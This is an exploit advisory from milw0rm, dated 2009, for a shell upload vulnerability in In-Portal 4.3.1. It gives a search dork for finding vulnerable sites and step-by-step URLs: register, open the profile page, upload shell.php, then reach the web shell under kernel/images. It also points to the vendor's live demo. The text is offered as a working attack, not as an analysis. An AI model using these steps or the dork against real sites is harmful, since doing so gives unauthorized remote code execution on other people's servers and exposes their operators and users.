43 lines
No EOL
924 B
Text
43 lines
No EOL
924 B
Text
=======================================================
|
|
+++++++++++++++++++ information +++++++++++++++++++++++
|
|
=======================================================
|
|
[+] Script :In-Portal v 4.3.1 Shell Upload Vulnerability
|
|
|
|
[+] D0rk : Powered by In-portal ® 1997-2009,
|
|
|
|
[+] Script site : www.in-portal.net
|
|
|
|
[+] Found by : Mr.tro0oqy
|
|
|
|
[+] C0ntact : t.4@windowslive.com <Yemeni ana>
|
|
=======================================================
|
|
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
|
|
=======================================================
|
|
exploit:
|
|
-------
|
|
step1: register in site
|
|
|
|
http://www.xxx.com/path/platform/login/register.html
|
|
|
|
step2: go to your profile
|
|
|
|
http://www.xxx.com/path/platform/my_account/my_profile.html
|
|
|
|
step3: upload shell.php
|
|
|
|
step4: get shell
|
|
|
|
http://www.xxx.com/path/kernel/images/shell.php
|
|
|
|
|
|
Demo:
|
|
-----
|
|
http://www.in-portal.net/demo
|
|
-----
|
|
|
|
|
|
|
|
|
|
Yemeni ana ;)
|
|
|
|
# milw0rm.com [2009-07-28] |